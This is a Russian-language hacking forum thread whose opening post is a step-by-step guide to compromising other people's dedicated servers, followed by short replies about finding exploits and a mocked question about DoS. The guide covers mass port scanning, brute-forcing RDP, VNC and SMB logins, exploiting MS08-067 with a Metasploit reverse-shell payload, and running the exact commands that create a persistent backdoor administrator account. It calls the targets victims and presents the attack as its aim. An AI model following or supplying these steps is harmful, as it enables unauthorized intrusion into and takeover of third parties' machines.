Мануал по взлому дедиков

Предыдущие сообщения
12 февраля 2012
#1 MyP3uk uid#1395 Доброго времени суток!

И так преступим, дедик он же dedicated server это выделенный сервер(подробнее смотрим на http://ru.wikipedia.org). Рассматривать мы будем брут. Следовательно мы будем искать открытые порты 445,139,3389,5900. На машинах с этими открытыми портами можно получить доступ к удаленному рабочему столу.

Начнем пожалуй с порта 5900 он же VNC. Цель для взлома как и все последующие мы будем искать с помощью сканера Angry IP scanner. Его интерфейс интуитивно понятен (вводим начальный и конечный IP для сканирования, и нажав на стрелочку возле кнопки Start выбираем нужный порт(нажимаем на кнопку рядом с Scan Ports и вводим порт)). Далее нажимаем старт и ждем когда сканер найдет и выдаст нам IP потенциальных жертв. Для удобства в настройках можно указать, чтобы отображались только IP которые онлайн и у них открыт нужный нам порт. Далее берем программу services.exe неизвестного мне автора. С помощью неё мы будем пытаться взломать дедики в каталоге с программой есть такие файлы как:
bad.txt - деды к которым пасс не подошел

good.txt - деды к которым пасс подошел

list.txt - ip дедиков которые мы пытаемся взломать

pass.txt - пассворд лист
option.ini - файл с настройками программы
GENERAL]
UIN=icq uin бота
PASS=пароль от номера бота
PassFile=pass.txt - файл с пассами.
UinSend= icq uin на который автоматом высылать гуды.
ListFile=list.txt - файл с ip адресами.
В самой программе нужно нажать только на кнопочку Start. Ну вобщем-то все, далее сами разберетесь.

Взлом дедиков с открытым 139,3389 портом аналогичен. Только софт другой. В качестве брута мы будем использовать Ntscan. В нем практически все также.
NT_user.dic - файл с логинами для брута.
NT_pass.dic - файл с паролями для брута.
host.txt - файл с IP дедиков для брута (надо создать вручную и выбрать при указании параметров брута)
В самой программе указываем нужный нам диапазон IP (если предварительно не отобрали дедики для брута), порт,количество потоков, тайм аут...Ну и вроде как все, нажимаем Start и радуемся...

И так теперь взлом компьютеров с открытым 445портом. Находим мы их как и все остальные с помощью сканера портов. Использовать мы будем уязвимость MS08-067_netapi присутствующую Sp SP2SP3 Pro. с помощью Metasploit 3.2.
Заходим Metasploit 3.2>GUI>Exploits>Windows>SMB>MS08-067_netapi (подробно о использовании Metasploit можно почитать в статьях -=Lebed=-), Payloads =generic/shell_reverse_tcp

Мы получаем консоль жертвы, с помощью FTP закачиваем настроенный RAdmin и потом через консоль радмина
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
создаем нового пользователя...

Ну вот у нас и есть дедик...
02:07:35 10
#2сообщение удалено
#3сообщение удалено
#4сообщение удалено
#5сообщение удалено
#6сообщение удалено
#7сообщение удалено
#8сообщение удалено
#9сообщение удалено
#10сообщение удалено
#11сообщение удалено
#12сообщение удалено
13 января 2014
#13 user uid#4763 В Metasploit стучать в 139 порт также как и в 445? Нашел Exploit http://www.exploit-db.com/exploits/109/ но в базе Metasploit'a найти его не могу :(


p.s.
Где есть перевод команд метасполита и их значения? Гугл скоро меня нахуй посылать будет...
15:30:00 0
#14 s0me0nE uid#1920 Юзер, ты неможко опоздал.
Published: 2003-10-09
Под вин эксплоиты тут нужно смотреть.
http://www.exploit-db.com/platform/?p=windows
17:40:51 0
#15 user uid#4763 s0me0nE, в икспайдере пишет что уязвимость кретическая, так как переполнен буфер. Вот искал мануал. Нашел только какой-то бред, входишь в каталог жд. 21:11:47 0
15 января 2014
#16 s0me0nE uid#1920 Автоматические поисковики уязвимостей - не торт, ибо уязвимости, в них заложеные, если не обновляются и не пополняются, фиксят довольно скоро. 02:07:56 0
7 апреля 2014
#17 dr.web uid#5829 как понимаю DoS атака взломает почти все ? Один раз попробовал на сервер Minecraft не получился , есть ли способ взломать соц. сети через DoS? 18:35:09 -1
#18 user uid#4763 23:33:05 0
#19 s0me0nE uid#1920 Такое принято закидывать минусами.
DoS расшифровывается, как Denial of Service, что в переводе дословно:"отказ в обслуживании". Такого рода атаки служат для того, чтобы пользователи не могли воспользоваться ресурсом сети.
00:04:55 0
#20 s0me0nE uid#1920 Прежде чем писать, принято гуглить. 00:05:27 0
#21 virtuoso uid#1428
как понимаю DoS атака взломает почти все ? Один раз попробовал на сервер Minecraft не получился , есть ли способ взломать соц. сети через DoS
Утра началось с весёлой шутки xD Юморист Один раз попробовал на сервер Minecraft не получился
09:55:14 0
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...